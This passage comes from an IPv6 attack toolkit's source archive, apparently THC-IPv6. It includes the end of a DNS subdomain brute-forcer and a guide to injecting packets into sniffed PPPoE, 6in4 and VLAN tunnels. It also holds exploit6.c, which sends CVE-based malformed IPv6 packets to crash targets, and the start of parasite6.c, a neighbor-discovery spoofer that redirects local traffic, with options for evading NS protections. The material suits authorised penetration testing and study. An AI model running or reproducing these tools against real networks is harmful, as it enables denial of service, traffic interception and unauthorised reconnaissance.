j++) { k = vptr[11] + vptr[10] * 256; if (vptr[2] == 0 && vptr[3] == 0x0c) { dbuf[0] = 0; dn_expand(vbuf, vbuf + len, vptr + 12, dbuf, sizeof(dbuf)); if (getaddrinfo(dbuf, NULL, &hints, &res) == 0) { q = NULL; q4 = NULL; found1 = 0; found2 = 0; for (p = res; p != NULL; p = p->ai_next) { if (do6 && p->ai_family == AF_INET6) { // IPv6 ipv6 = (struct sockaddr_in6 *) p->ai_addr; addr = &(ipv6->sin6_addr); if (q == NULL || memcmp(&ipv6->sin6_addr, &q->sin6_addr, 16) != 0) { q = ipv6; // convert the IP to a string and print it: inet_ntop(p->ai_family, addr, ipv6str, sizeof ipv6str); snprintf(buf, sizeof(buf), "%s => %s is %s\n", dom, dbuf, ipv6str); printf("%s", buf); if (found1 == 0) { ++found; found1 = 1; } } } else if (do4 && p->ai_family == AF_INET) { // IPv4 ipv4 = (struct sockaddr_in *) p->ai_addr; addr4 = &(ipv4->sin_addr); if (q4 == NULL || memcmp(&ipv4->sin_addr, &q4->sin_addr, 4) != 0) { q4 = ipv4; // convert the IP to a string and print it: inet_ntop(p->ai_family, addr4, ipv4str, sizeof(ipv4str)); snprintf(buf, sizeof(buf), "%s => %s is %s\n", dom, dbuf, ipv4str); printf("%s", buf); if (found2 == 0) { ++found4; found2 = 1; } } } } freeaddrinfo(res); } else { snprintf(buf, sizeof(buf), "%s => %s\n", dom, dbuf); printf("%s", buf); } } vptr += k + 12; ucountsrvs++; } } //else printf("ptr: %s %d len %d code %d valid\n", dom, len, (vbuf[3] & 15), vbuf[2]); } // user wants delay between DNS requests? if (delay) dodelay(milliseconds); i++; } return; } // there be dragons. This might have a buffer overflow in here if the dns // server sends a malformed DNS reply. luckily we dont copy anything here. void dump_dns(char *dom, int type) { int len, cnt, i, j, found = 0, found1, found4 = 0, allfound = 0, found2; unsigned char vbuf[1500], *vptr = vbuf + 2; char dbuf[256], fbuf[256][256]; struct addrinfo hints, *res, *p; struct sockaddr_in6 *ipv6, *q; char ipv6str[INET6_ADDRSTRLEN], ipv4str[16]; struct sockaddr_in *ipv4, *q4; void *addr, *addr4; memset((char *) &hints, 0, sizeof(hints)); hints.ai_family = dof; if (((len = res_query(dom, ns_c_in, type, vbuf, sizeof(vbuf))) < (30 + strlen(dom))) || ((*vptr & 0x82) != 0x80) || ((*(vptr + 1) & 0x0f) != 0)) { fprintf(stderr, "Warning: no %s information found\n", type == ns_t_ns ? "name server (NS)" : "mail sever (MX)"); return; } vptr += 4; cnt = *vptr * 256 + *(vptr + 1); if (cnt < 1 || cnt > 16) { fprintf(stderr, "Warning: no %s information found\n", type == ns_t_ns ? "name server (NS)" : "mail sever (MX)"); return; } vptr += 6; vptr += strlen(dom) + 1; vptr += 4; // we are no at the beginning of the answer section do { vptr += 10; if (type == ns_t_mx) vptr += 2; dbuf[0] = 0; dn_expand(vbuf, vbuf + len, vptr + 2, dbuf, sizeof(dbuf)); #if DEBUG printf("Found %s for %s: %s\n", type == ns_t_mx ? "MX" : "NS", dom, dbuf); #endif if (vptr < vbuf + len && dbuf[0] != 0) { // BOF protection dbuf[255] = 0; i = 0; if (allfound > 0) { for (j = 0; j < allfound; j++) if (strcmp(dbuf, fbuf[j]) == 0) i = 1; } strcpy(fbuf[allfound], dbuf); allfound++; if (i == 0 && getaddrinfo(dbuf, NULL, &hints, &res) == 0) { q = NULL; q4 = NULL; found1 = 0; found2 = 0; for (p = res; p != NULL; p = p->ai_next) { if (do6 && p->ai_family == AF_INET6) { // IPv6 ipv6 = (struct sockaddr_in6 *) p->ai_addr; addr = &(ipv6->sin6_addr); if (q == NULL || memcmp(&ipv6->sin6_addr, &q->sin6_addr, 16) != 0) { q = ipv6; // convert the IP to a string and print it: inet_ntop(p->ai_family, addr, ipv6str, sizeof ipv6str); printf("%s of %s is %s. => %s\n", type == ns_t_mx ? "MX" : "NS", dom, dbuf, ipv6str); if (found1 == 0) { ++found; found1 = 1; } } } else if (do4 && p->ai_family == AF_INET) { // IPv4 ipv4 = (struct sockaddr_in *) p->ai_addr; addr4 = &(ipv4->sin_addr); if (q4 == NULL || memcmp(&ipv4->sin_addr, &q4->sin_addr, 4) != 0) { q4 = ipv4; // convert the IP to a string and print it: inet_ntop(p->ai_family, addr4, ipv4str, sizeof ipv4str); printf("%s of %s is %s. => %s\n", type == ns_t_mx ? "MX" : "NS", dom, dbuf, ipv4str); if (found2 == 0) { ++found4; found2 = 1; } } } } freeaddrinfo(res); } } if (type == ns_t_ns) vptr += vptr[1] + 2; else vptr += vptr[-1]; cnt--; } while (vptr < vbuf + len && cnt > 0); if (found == 0 && do6) printf("No IPv6 address for %s entries found in DNS for domain %s\n", type == ns_t_mx ? "MX" : "NS", dom); if (found4 == 0 && do4) printf("No IPv4 address for %s entries found in DNS for domain %s\n", type == ns_t_mx ? "MX" : "NS", dom); } int main(int argc, char *argv[]) { unsigned short wordlist = FALSE, threads = 8, dumpit = 0, showdns = 0; unsigned long int wcount = 0; int i = 0, j, k; char dom[MAXSTRSIZE] = "", *wordlistFilename = NULL; FILE *fpWords; char typ = 't', **sub_orig; pthread_t thread[MAX_THREADS]; setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); do4 = 1; do6 = 1; if (argv[0] != NULL && argv[0][0] != 0) i = argv[0][strlen(argv[0]) - 1]; if (i == '4') do6 = 0; if (i == '6') do4 = 0; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0 || strncmp(argv[1], "--h", 3) == 0) help(argv[0]); while ((i = getopt(argc, argv, "dt:smlxuSD46")) >= 0) { switch (i) { case '4': do4 = 1; break; case '6': do6 = 0; break; case 'd': showdns = 1; break; case 't': threads = atoi(optarg); break; case 's': sub = (char **) sub_small; break; case 'm': sub = (char **) sub_medium; break; case 'l': sub = (char **) sub_large; break; case 'x': sub = (char **) sub_xtreme; break; case 'u': sub = (char **) sub_uber; break; case 'D': dumpit = 1; break; case 'S': dosrv = 1; break; default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } if (do4 && do6) dof = 0; else if (do4 && do6 == 0) dof = AF_INET; else dof = AF_INET6; if (threads > MAX_THREADS) { threads = MAX_THREADS; fprintf(stderr, "Warning: setting threats to maximum of %d\n", threads); } if (threads < 1) threads = 1; if (dumpit) { i = 0; while (sub[i] != NULL && sub[i][0] != 0) printf("%s\n", sub[i++]); exit(0); } if (argc == optind || argc > optind + 2) { fprintf(stderr, "Error: invalid options, try \"-h\" for help!\n"); exit(-1); } if (argc > (optind + 1)) { wordlist = TRUE; wordlistFilename = argv[optind + 1]; } for (i = 0; argv[optind][i]; ++i) // convert domain to lower case argv[optind][i] = (tolower(argv[optind][i])); strcpy(domain, argv[optind]); if (domain[strlen(domain) - 1] == '.') domain[strlen(domain) - 1] = 0; #if DEBUG printf("domain: %s\n", domain); #endif if (isValidDomain(domain) < 0) { fprintf(stderr, "Error: domain seems not to be valid: %s\n", domain); exit(-1); } strcat(domain, "."); if (verifyDomain(domain) != TRUE) { fprintf(stderr, "Error: no name server (NS) entry for domain %s exists\n", domain); exit(-1); } printf("Starting DNS enumeration work on %s ...\n", domain); if (showdns) { printf("Gathering NS and MX information...\n"); dump_dns(domain, ns_t_ns); dump_dns(domain, ns_t_mx); printf("\n"); } if (dosrv) { sub_orig = sub; sub = (char **) sub_srv; printf("Starting SRV service enumeration\n"); printf("Estimated time to completion: 1 to 4 minutes\n"); lists = malloc(threads * sizeof(void *)); for (i = 0; i < threads; i++) { listptr[i] = 0; lists[i] = malloc(65536 * sizeof(int)); } i = j = 0; while (sub[j] != NULL && sub[j][0] != 0) { lists[i][listptr[i]] = malloc(strlen(sub[j]) + 1); strcpy(lists[i][listptr[i]], sub[j]); listptr[i] += 1; i++; if (i >= threads) i = 0; wcount++; j++; } for (k = 0; k < threads; k++) { lists[k][listptr[k]] = malloc(2); lists[k][listptr[k]][0] = 0; lists[k][listptr[k] + 1] = NULL; } type = "_tcp"; if (dnsquerycode(type, domain, ns_t_srv) == 0) { dosrv++; for (i = 0; i < threads; i++) pthread_create(&thread[i], NULL, (void *) threaded_resolve_srv, (void *) lists[i]); for (i = 0; i < threads; i++) pthread_join(thread[i], NULL); } else printf("No SRV entries for TCP\n"); type = "_udp"; if (dnsquerycode(type, domain, ns_t_srv) == 0) { dosrv++; for (i = 0; i < threads; i++) pthread_create(&thread[i], NULL, (void *) threaded_resolve_srv, (void *) lists[i]); for (i = 0; i < threads; i++) pthread_join(thread[i], NULL); } else printf("No SRV entries for UDP\n"); if (dosrv > 1) printf("Found %d services with %d entries altogether\n\n", ucountsrv, ucountsrvs); sub = sub_orig; type = NULL; } lists = malloc(threads * sizeof(void *)); for (i = 0; i < threads; i++) { listptr[i] = 0; lists[i] = malloc(65536 * sizeof(int)); } wcount = 0; // split wordlist to thread lists if (wordlist == TRUE) { fpWords = fopen(wordlistFilename, "r"); if (fpWords) { i = 0; while (!feof(fpWords)) { j = fscanf(fpWords, "%100s", dom); // wordlist subdomain not allowed to be more than 100 chars // put in list here lists[i][listptr[i]] = malloc(strlen(dom) + 1); strcpy(lists[i][listptr[i]], dom); listptr[i] += 1; if (listptr[i] >= 65534) { fprintf(stderr, "Error: wordlist too large (max: %d)!\n", 65536 * threads); exit(-1); } i++; wcount++; if (i >= threads) i = 0; } } else { fprintf(stderr, "Error: could not open file %s\n", wordlistFilename); exit(-1); } fclose(fpWords); } else { i = j = 0; while (sub[j] != NULL && sub[j][0] != 0) { lists[i][listptr[i]] = malloc(strlen(sub[j]) + 1); strcpy(lists[i][listptr[i]], sub[j]); listptr[i] += 1; i++; if (i >= threads) i = 0; wcount++; j++; } } for (k = 0; k < threads; k++) { lists[k][listptr[k]] = malloc(2); lists[k][listptr[k]][0] = 0; lists[k][listptr[k] + 1] = NULL; } if (wcount < threads) threads = wcount; printf("Starting enumerating %s - creating %d threads for %d words...\n", domain, threads, (int) wcount); printf("Estimated time to completion: %d to %d minute%s\n", (int) ((wcount / 300) / threads) + 1, (int) ((wcount / 90) / threads) + 1, ((wcount / 60) / threads) + 1 > 1 ? "s" : ""); // wildcard detection wildcarDetect(domain); for (i = 0; i < threads; i++) pthread_create(&thread[i], NULL, (void *) threaded_resolve, (void *) lists[i]); for (i = 0; i < threads; i++) pthread_join(thread[i], NULL); if (do4 && do6) printf("\nFound %d domain name%s, %d unique ipv4 and %d unique ipv6 addresses for %s\n", found, found == 1 ? "" : "s", ucount4 + wcard4, ucount + wcard, domain); else if (do4) printf("\nFound %d domain name%s and %d unique ipv4 address%s for %s\n", found, found == 1 ? "" : "s", ucount4 + wcard4, (ucount4 + wcard4) == 1 ? "" : "s", domain); else printf("\nFound %d domain name%s and %d unique ipv6 address%s for %s\n", found, found == 1 ? "" : "s", ucount + wcard, (ucount + wcard) == 1 ? "" : "s", domain); return 0; } thc-ipv6-2.5/HOWTO-INJECT0000644000000000000000000001111212234222353013305 0ustar rootrootINTRODUCTION ============ Since v1.91 the THC-IPv6 toolkit has injection support for PPPoE, 6in4 and VLAN-Q tunnels. For this to work, you must be on the network path where the PPPoE, 6in4 or VLAN-Q tunnel is traversing over. This is activated via environment variables. VLAN-Q ====== For VLAN-Q injection you have to set the environment variable THC_IPV6_VLAN with the necessary information in the following format: srcmac,dstmac,vlan-id To get this information, you must sniff the necessary information on the Ethernet you are injection from. This tcpdump command will help you: tcpdump -i eth0 -n -vvv -e ether proto 0x8100 you will need the source mac address, destination mac address and the VLAN ID. Be sure to set the source and destination mac address right :-) with this information you can set up the environment, e.g.: export THC_IPV6_VLAN=01:01:01:01:01:01,02:02:02:02:02:02,1 Note: the VLAN ID must be in decimal form. Also note that VLAN injection can be done additionally to PPPoE and 6in4 if required, just set the other environment variable as well! PPPoE ===== For PPPoE injection you have to set the environment variable THC_IPV6_PPPOE with the necessary information in the following format: srcmac,dstmac,ppp-sessionid To get this information, you must sniff the necessary information on the Ethernet you are injection from. This tcpdump command will help you: tcpdump -i eth0 -n -vvv -e ether proto 0x8864 you will need the source mac address, destination mac address and the PPP sessionID. Be sure to set the source and destination mac address right :-) with this information you can set up the environment, e.g.: export THC_IPV6_PPPOE=01:01:01:01:01:01,02:02:02:02:02:02,0f2b Note: the PPP SessionID must be in hexadecimal form, with leading zeros and no 0x, \x or similar in front. 6in4 ==== For 6in4 injection you have to set the environment variable THC_IPV6_6IN4 with the necessary information in the following format: srcmac,dstmac,src-ipv4,dst-ipv4 To get this information, you must sniff the necessary information on the Ethernet you are injection from. This tcpdump command will help you: tcpdump -i eth0 -n -e ip proto 41 you will need the source mac address, destination mac address, the source IPv4 address and the destination IPv4 address. Be sure to set the source and destination mac/IPv4 addresses right :-) with this information you can set up the environment, e.g.: export THC_IPV6_6IN4=01:01:01:01:01:01,02:02:02:02:02:02,1.1.1.1,2.2.2.2 KEEPING THE SESSION ALIVE ========================= In case you have to disconnect the client tunnel endpoint to perform your tests, usually this will terminate the tunnel after some time as the server side often sends keep-alive packets. There is a tool in the package you can run to answer these keep-alive packets called inject_alive. Just run it with the proper environment variable and the interface: inject_alive eth0 If you tunnel type is PPPoE, it will even warn if the PPPoE session ID seen is different to the one you specified in the environment (and uses the one seen on the wire). RUNNING THE TOOLS ================= running the tools is then simple as a piece of cake: you just run them normally, and the injection is all done in the background. All tools will print one of the following messages when run in injection mode: Information: PPPoE injection/sniffin activated or Information: 6in4 injection/sniffin activated By this you see that the injection is active. In case you run the tools in the wrong shell that do not have the environment variable set, you will not see the message and therefore have an indicator what the problem is :-) If the tool does not support injection you will see the following message: WARNING: ./tool6 is not working with injection! One important thing to note!! You might need to set a specific source ipv6 address with the tools to make them work if global addresses (non-link-local addresses) are used. e.g. when the source IPv6 to use is 2003::1 and the target is ipv6.google.com => thcping6 eth0 2003::1 ipv6.google.com alive26 -I 2003::1 eth0 ipv6.google.com trace6 -s 2003::1 eth0 ipv6.google.com But of course it is easier to just configure that as you only global IPv6 addresses so that everything works, e.g. ip -6 addr add 2003::1/64 dev eth0 The following tools do not work with injection or are pointless to use there: parasite6 fake_solicitate6 fake_advertise6 connect6 detect_sniffer6 flood_advertise6 flood_solicitate6 inverse_lookup6 dnsdict6 dnsrevenum6 fake_dnsupdate6 fake_dhcps6 flood_dhcpc6 HELP? ===== email me at vh@thc.org feedback is always appreciated! thc-ipv6-2.5/exploit6.c0000644000000000000000000002753512251022435013444 0ustar rootroot/* * Tests various known IPv6 vulnerabilities against a target. * */ #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" unsigned short int ports[] = { 22, 25, 53, 80, 443, 0 }; int rawmode = 0; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface destination [test-case-number]\n\n", prg); printf("Performs exploits of various CVE known IPv6 vulnerabilities on the destination\n"); printf("Note that for exploitable overflows only 'AAA...' strings are used.\n"); printf("If a system is vulnerable, it will crash, so be careful!\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } void ignoreit() { return; } int check_alive(pcap_t * p, char *interface, unsigned char *src, unsigned char *dst) { int ret = -2; time_t t; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); thc_ping6(interface, src, dst, 16, 1); t = time(NULL); while (ret < 0) { if (thc_pcap_check(p, (char *) ignoreit, NULL) > 0) ret = 1; if (time(NULL) > t + 1 && ret == -2) { thc_ping6(interface, src, dst, 16, 1); ret = -1; } if (time(NULL) > t + 4 && ret < 0) ret = 0; } return ret > 0 ? 1 : 0; } int main(int argc, char *argv[]) { int test = 0, count = 1, tmplen; unsigned char buf[1500], bla[1500], tests[256], string[64] = "ip6 and dst ", string2[64] = "ip6 and src "; unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal; unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6]; thc_ipv6_hdr *hdr; int i = 0, j, srcmtu, fragsize, offset = 14; pcap_t *p; unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL; int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500; char *interface; thc_ipv6_hdr *ipv6; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (strcmp(argv[1], "-p") == 0) { noping = 1; argv++; argc--; } if (do_hdr_size) offset = do_hdr_size; interface = argv[1]; dst6 = thc_resolve6(argv[2]); route6 = thc_resolve6("2a01::"); memcpy(ldst6, dst6, 16); memset(ldst6 + 2, 0, 6); ldst6[0] = 0xfe; ldst6[1] = 0x80; mcast6 = thc_resolve6("ff02::1"); if (argc >= 4) test = atoi(argv[3]); memset(buf, 0, sizeof(buf)); memset(null_buffer, 0, sizeof(null_buffer)); src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } strcat(string, thc_ipv62notation(src6)); strcat(string2, thc_ipv62notation(dst6)); srcmac = thc_get_own_mac(interface); if (rawmode == 0) { if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]); exit(-1); } } else dstmac = null_buffer; if ((srcmtu = thc_get_mtu(interface)) <= 0) { fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface); exit(-1); } if (do_hdr_size) srcmtu -= (do_hdr_size - 14); fragsize = ((srcmtu - 62) / 8) * 8; if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } setvbuf(stdout, NULL, _IONBF, 0); memset(tests, 0, sizeof(tests)); printf("Performing vulnerability checks on %s via %s:\n", argv[2], argv[1]); if (noping == 0 && check_alive(p, interface, src6, dst6) == 0) { fprintf(stderr, "Error: target %s is not alive via direct ping6!\n", argv[2]); exit(-1); } else printf("Test 0: normal ping6\t\t\t\tPASSED - we got a reply\n"); /********************** TEST CASES ************************/ if (test == 0 || test == count) { // 1432 printf("Test %2d: CVE-NONE overlarge ping, 6 checksum combinations\n", count); tmplen = 65864; if ((mal = malloc(tmplen)) == NULL) return -1; memset(mal, count % 256, tmplen); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; // because of the different possible checksum calculations we have to do them all hdr->pkt[offset + 40 + 3] = 0xe5; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; hdr->pkt[offset + 40 + 2] = 0x98; hdr->pkt[offset + 40 + 3] = 0xa4; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; hdr->pkt[offset + 40 + 3] = 0xa3; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; hdr->pkt[offset + 40 + 2] = 0x84; hdr->pkt[offset + 40 + 3] = 0x90; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; hdr->pkt[offset + 40 + 3] = 0x8f; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; free(mal); pkt = thc_destroy_packet(pkt); } count++; if (test == 0 || test == count) { // 1432 printf("Test %2d: CVE-NONE large ping, 3 checksum combinations\n", count); tmplen = 65527; if ((mal = malloc(tmplen)) == NULL) return -1; memset(mal, count % 256, tmplen); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; // because of the different possible checksum calculations we have to do them all hdr->pkt[offset + 40 + 2] = 0x31; hdr->pkt[offset + 40 + 3] = 0x8c; thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize); hdr->pkt[offset + 40 + 3] = 0x8a; thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize); free(mal); pkt = thc_destroy_packet(pkt); } count++; if (test == 0 || test == count) { printf("Test %2d: CVE-2003-0429 bad prefix length (little information, implementation unsure\n", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[6] = 4; // 4-7: retrans timer // option mtu buf[8] = 5; buf[9] = 1; buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; // option prefix buf[16] = 3; buf[17] = 4; buf[18] = 128; // prefix length // BUG IS HERE buf[19] = 128 + 64; memset(&buf[20], 17, 4); memset(&buf[24], 4, 4); memcpy(&buf[32], route6, 16); i += 28; // mac address option buf[i++] = 1; buf[i++] = 1; memcpy(buf + i, srcmac, 6); i += 6; // default route routing option buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 0x00; // prefix length buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word i += 16; // 56-71 address, all zeros for default thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); } count++; if (test == 0 || test == count) { printf("Test %2d: CVE-2004-0257 ping, send toobig on reply, then SYN pkt\n", count); memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &bla, 68, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; ipv6 = (thc_ipv6_hdr *) pkt; thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset); sleep(1); thc_toobig6(interface, src6, srcmac, dstmac, 68, ipv6->pkt + offset, ipv6->pkt_len - offset); i = 0; while (ports[i] != 0) { if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_tcp(pkt, &pkt_len, 1100 + i * 100, ports[i], i * 1000, 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); pkt_len = 0; i++; } } count++; /* if (test == 0 || test == count) { printf("Test %2d: CVE-20\n", count); memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; buf[0] = 0; thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); } count++; if (test == 0 || test == count) { printf("Test %2d: CVE-20\n", count); memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; buf[0] = 0; thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); } count++; */ /* if (test == 0 || test == count) { printf("Test %2d: CVE-20\n", count); memset(bla, count%256, sizeof(bla)); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; buf[0] = 0; thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); } count++; */ // more? /******************* END OF TESTCASES ***************************/ if (noping == 1 || check_alive(p, interface, src6, dst6)) printf("Test %2d: normal ping6 (still alive?)\t\tPASSED - we got a reply\n", count); else printf("Test %2d: normal ping6 (still alive?)\t\tFAILED - target is unavailable now!\n", count); thc_pcap_close(p); return 0; } thc-ipv6-2.5/parasite6.c0000644000000000000000000002372112251022440013555 0ustar rootroot#include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" unsigned char *pkt = NULL, *pkt2 = NULL; int pkt_len = 0, pkt2_len = 0; thc_ipv6_hdr *ipv6, *ipv62; int mychecksum, do_loop = 0, pp[65536], pp_cnt = 0, do_hop = 0, do_frag = 0, do_dst = 0, do_reverse = 0, cnt, ptype = NXT_ICMP6; char *interface; char *ptr1, *ptr2, *ptr3, *ptr4; thc_ipv6_hdr *hdr; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-lRFHD] interface [fake-mac]\n\n", prg); printf("This is an \"ARP spoofer\" for IPv6, redirecting all local traffic to your own\n"); printf("system (or nirvana if fake-mac does not exist) by answering falsely to\n"); printf("Neighbor Solitication requests\n"); printf("Option -l loops and resends the packets per target every 5 seconds.\n"); printf("Option -R will also try to inject the destination of the solicitation\n"); printf("NS security bypass: -F fragment, -H hop-by-hop and -D large destination header\n"); exit(-1); } void kill_children(int signo) { int i; for (i = 0; i <= pp_cnt; i++) if (pp[i] > 0 && pp[i] < 65536) kill(pp[i], SIGKILL); exit(0); } void intercept(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ipv6hdr = (unsigned char *) (data + 14); if (debug) { printf("DEBUG: packet received\n"); thc_dump_data((unsigned char *) data, header->caplen, "Received Packet"); } if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_NEIGHBORSOL || header->caplen < 78) return; if (*(data + 22) + *(data + 23) + *(data + 24) + *(data + 25) + *(data + 34) + *(data + 35) + *(data + 36) + *(data + 37) == 0) return; if (debug) printf("DEBUG: packet is a valid icmp6 neighbor solitication\n"); memcpy(ipv6->pkt, data + 6, 6); // copy srcmac to dstmac memcpy(ipv6->pkt + 38, data + 22, 16); // copy srcip6 to dstip6 memcpy(ipv6->pkt + 22, data + 62, 16); // copy target to srcip6 memcpy(ipv6->pkt + 62 + (do_dst * 1400) + (do_hop + do_frag) * 8, data + 62, 16); // copy target to target ipv6->pkt[56 + (do_dst * 1400) + (do_hop + do_frag) * 8] = 0; ipv6->pkt[57 + (do_dst * 1400) + (do_hop + do_frag) * 8] = 0; mychecksum = checksum_pseudo_header(ipv6->pkt + 22, ipv6->pkt + 38, NXT_ICMP6, ipv6->pkt + 54 + (do_dst * 1400) + (do_hop + do_frag) * 8, 32); ipv6->pkt[56 + (do_dst * 1400) + (do_hop + do_frag) * 8] = mychecksum / 256; ipv6->pkt[57 + (do_dst * 1400) + (do_hop + do_frag) * 8] = mychecksum % 256; if (do_dst) thc_send_as_fragment6(interface, ipv6->pkt + 22, ipv6->pkt + 38, ptype, ipv6->pkt + 40 + 14, ipv6->pkt_len - 40 - 14, 1240); else thc_send_pkt(interface, pkt, &pkt_len); ptr2 = thc_ipv62notation(ipv6->pkt + 38); ptr4 = thc_ipv62notation(ipv6->pkt + 22); printf("Spoofed packet to %s as %s\n", ptr2, ptr4); free(ptr2); free(ptr4); ipv6->pkt[pkt_len - 28] = 0xa0; // reset SOL flag, ROUTER+OVERRIDE only ipv6->pkt[56 + (do_dst * 1400) + (do_hop + do_frag) * 8] = 0; ipv6->pkt[57 + (do_dst * 1400) + (do_hop + do_frag) * 8] = 0; mychecksum = checksum_pseudo_header(ipv6->pkt + 22, ipv6->pkt + 38, NXT_ICMP6, ipv6->pkt + 54 + (do_dst * 1400) + (do_hop + do_frag) * 8, 32); 